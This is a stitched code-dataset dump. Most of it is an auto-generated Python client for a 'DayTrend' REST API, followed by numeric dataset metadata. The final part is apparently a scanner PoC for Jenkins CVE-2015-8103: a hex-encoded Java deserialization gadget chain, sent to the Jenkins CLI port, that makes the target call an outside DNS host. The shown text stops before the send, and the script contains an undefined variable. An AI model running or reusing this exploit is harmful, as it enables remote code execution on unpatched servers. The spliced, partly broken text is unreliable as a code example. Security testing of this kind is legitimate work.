:param str _or: <h4>Adds <code>OR</code> conditions to the request.</h4><i>Syntax:</i> <strong>?or=field||condition||value</strong><br/>It uses the same conditions as the filter parameter<br/><i>Rules and <i>Examples:</i></i><ul><li>If there is only <strong>one</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as simple filter:</li><ul><li><strong>?or=name||eq||batman</strong></li></ul></ul><ul><li>If there are <strong>multiple</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as a compination of <code>OR</code> conditions, as follows:<br><code>WHERE {or} OR {or} OR ...</code></li><ul><li><strong>?or=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If there are <strong>one</strong> <code>or</code> and <strong>one</strong> <code>filter</code> then it will be interpreted as <code>OR</code> condition, as follows:<br><code>WHERE {filter} OR {or}</code></li><ul><li><strong>?filter=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If present <strong>both</strong> <code>or</code> and <code>filter</code> in any amount (<strong>one</strong> or <strong>miltiple</strong> each) then both interpreted as a combitation of <code>AND</code> conditions and compared with each other by <code>OR</code> condition, as follows:<br><code>WHERE ({filter} AND {filter} AND ...) OR ({or} AND {or} AND ...)</code></li><ul><li><strong>?filter=type||eq||hero&filter=status||eq||alive&or=type||eq||villain&or=status||eq||dead</strong></li></ul></ul>
:param str sort: <h4>Adds sort by field (by multiple fields) and order to query result.</h4><i>Syntax:</i> <strong>?sort=field,ASC|DESC</strong><br/><i>Examples:</i></i><ul><li><strong>?sort=name,ASC</strong></li><li><strong>?sort=name,ASC&sort=id,DESC</strong></li></ul>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float per_page: <h4>Receive <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?per_page=number</strong><br/><i>Example:</i> <strong>?per_page=10</strong>
:param float offset: <h4>Offset <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?offset=number</strong><br/><i>Example:</i> <strong>?offset=10</strong>
:param float page: <h4>Receive a portion of <code>limit</code> entities (alternative to <code>offset</code>). Will be applied if <code>limit</code> is set up.</h4><i>Syntax:</i> <strong>?page=number</strong><br/><i>Example:</i> <strong>?page=2</strong>
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields', 'filter', '_or', 'sort', 'join', 'per_page', 'offset', 'page', 'cache'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if '_or' in params:
query_params.append(('or', params['_or'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'join' in params:
query_params.append(('join', params['join'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'cache' in params:
query_params.append(('cache', params['cache'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DayTrend]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_delete(self, id, **kwargs): # noqa: E501
"""Delete one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_get(self, id, **kwargs): # noqa: E501
"""Retrieve one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_get_with_http_info(id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fields', 'join', 'cache'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'join' in params:
query_params.append(('join', params['join'])) # noqa: E501
if 'cache' in params:
query_params.append(('cache', params['cache'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_patch(self, day_trend, id, **kwargs): # noqa: E501
"""Update one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_patch(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_patch_with_http_info(day_trend, id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_patch_with_http_info(day_trend, id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_patch_with_http_info(self, day_trend, id, **kwargs): # noqa: E501
"""Update one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_patch_with_http_info(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['day_trend', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'day_trend' is set
if ('day_trend' not in params or
params['day_trend'] is None):
raise ValueError("Missing the required parameter `day_trend` when calling `v1_day_trend_id_patch`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_patch`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'day_trend' in params:
body_params = params['day_trend']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_put(self, day_trend, id, **kwargs): # noqa: E501
"""Replace one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_put(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_put_with_http_info(day_trend, id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_put_with_http_info(day_trend, id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_put_with_http_info(self, day_trend, id, **kwargs): # noqa: E501
"""Replace one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_put_with_http_info(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['day_trend', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'day_trend' is set
if ('day_trend' not in params or
params['day_trend'] is None):
raise ValueError("Missing the required parameter `day_trend` when calling `v1_day_trend_id_put`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'day_trend' in params:
body_params = params['day_trend']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_post(self, day_trend, **kwargs): # noqa: E501
"""Create one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_post(day_trend, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_post_with_http_info(day_trend, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_post_with_http_info(day_trend, **kwargs) # noqa: E501
return data
def v1_day_trend_post_with_http_info(self, day_trend, **kwargs): # noqa: E501
"""Create one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_post_with_http_info(day_trend, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['day_trend'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'day_trend' is set
if ('day_trend' not in params or
params['day_trend'] is None):
raise ValueError("Missing the required parameter `day_trend` when calling `v1_day_trend_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'day_trend' in params:
body_params = params['day_trend']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_replace_all_in_source_source_id_post(self, source_id, day_trend_input_list_dto, **kwargs): # noqa: E501
"""Imports many trends and replace existing. Recomputes alerts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_replace_all_in_source_source_id_post(source_id, day_trend_input_list_dto, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float source_id: (required)
:param DayTrendInputListDto day_trend_input_list_dto: (required)
:return: DayTrendListDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_replace_all_in_source_source_id_post_with_http_info(source_id, day_trend_input_list_dto, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_replace_all_in_source_source_id_post_with_http_info(source_id, day_trend_input_list_dto, **kwargs) # noqa: E501
return data
def v1_day_trend_replace_all_in_source_source_id_post_with_http_info(self, source_id, day_trend_input_list_dto, **kwargs): # noqa: E501
"""Imports many trends and replace existing. Recomputes alerts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_replace_all_in_source_source_id_post_with_http_info(source_id, day_trend_input_list_dto, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float source_id: (required)
:param DayTrendInputListDto day_trend_input_list_dto: (required)
:return: DayTrendListDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['source_id', 'day_trend_input_list_dto'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_replace_all_in_source_source_id_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'source_id' is set
if ('source_id' not in params or
params['source_id'] is None):
raise ValueError("Missing the required parameter `source_id` when calling `v1_day_trend_replace_all_in_source_source_id_post`") # noqa: E501
# verify the required parameter 'day_trend_input_list_dto' is set
if ('day_trend_input_list_dto' not in params or
params['day_trend_input_list_dto'] is None):
raise ValueError("Missing the required parameter `day_trend_input_list_dto` when calling `v1_day_trend_replace_all_in_source_source_id_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_id' in params:
path_params['sourceId'] = params['source_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'day_trend_input_list_dto' in params:
body_params = params['day_trend_input_list_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/replace-all-in-source/{sourceId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrendListDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 54.048
| 2,038
| 0.632855
| 6,225
| 47,292
| 4.608353
| 0.051888
| 0.041552
| 0.025796
| 0.015896
| 0.975808
| 0.969708
| 0.955659
| 0.947572
| 0.940077
| 0.933315
| 0
| 0.016293
| 0.231688
| 47,292
| 874
| 2,039
| 54.10984
| 0.773221
| 0.494841
| 0
| 0.776842
| 1
| 0
| 0.192073
| 0.057147
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035789
| false
| 0
| 0.008421
| 0
| 0.096842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d0d918d50f97599ad706e14910e3b0bf0085626d
| 22,512
|
py
|
Python
|
scanner/util/script/poc_jenkins_CVE_2015_8103.py
|
Shinpachi8/webscanner
|
52aa377f0ee903a04ed19ea07433d0718697833d
|
[
"Apache-2.0"
] | 5
|
2018-04-27T12:34:08.000Z
|
2020-11-09T10:47:02.000Z
|
scanner/util/script/poc_jenkins_CVE_2015_8103.py
|
Shinpachi8/webscanner
|
52aa377f0ee903a04ed19ea07433d0718697833d
|
[
"Apache-2.0"
] | null | null | null |
scanner/util/script/poc_jenkins_CVE_2015_8103.py
|
Shinpachi8/webscanner
|
52aa377f0ee903a04ed19ea07433d0718697833d
|
[
"Apache-2.0"
] | 3
|
2019-04-08T19:58:20.000Z
|
2020-04-07T15:35:07.000Z
|
# -*- encoding:utf-8 -*-
import socket
import base64
import random
import urllib2
import time
import binascii
from config import is_port_open
def random_str(len):
str1 = ""
for i in range(len):
str1 += (random.choice("ABCDEFGH1234567890"))
return str(str1)
def get_ver_ip(ip):
addr = 'devil.dns.yoyostay.top'
return addr
# @is_port_open
def verify(ip, port=80, name=None, timeout=10, types='ip'):
info = {
"url": "http://{}:{}".format(ip, port),
"severity": "high",
"vuln_name": "jenkins rce cve_2015_8103",
"proof": "YES",
}
try:
if tyeps != 'ip':
return
r = urllib2.urlopen('http://' + ip + ':' + str(port), timeout=timeout)
cli_port = int(r.headers['X-Jenkins-CLI-Port'])
socket.setdefaulttimeout(timeout)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (ip, cli_port)
sock.connect(server_address)
headers = '\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
sock.send(headers)
data = sock.recv(1024)
data = sock.recv(1024)
dd = "aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b78707672000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00154c0004686f737471007e00154c000870726f746f636f6c71007e00154c000372656671007e001578707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00155b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb342020000787074000e676574436f6e7374727563746f727571007e001d000000017671007e001d7371007e00177571007e001b00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740026687474703a2f2f3235352e3235352e3235352e3235353a383038382f6164642f72616e646f6d74000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e00177571007e001b0000000074000a6f70656e53747265616d7571007e001d000000007371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e0037"
payloadObj = binascii.a2b_hex(dd)
dnsserver = get_ver_ip(ip)
ramdmum = random_str(6 + 15 - len(dnsserver))
payloadObj = payloadObj.replace('http://255.255.255.255:8088/add/random', 'http://' + ramdmum + '.' + dnsserver +'/jenkins_cve_2015/')
payload_b64 = base64.b64encode(payloadObj)
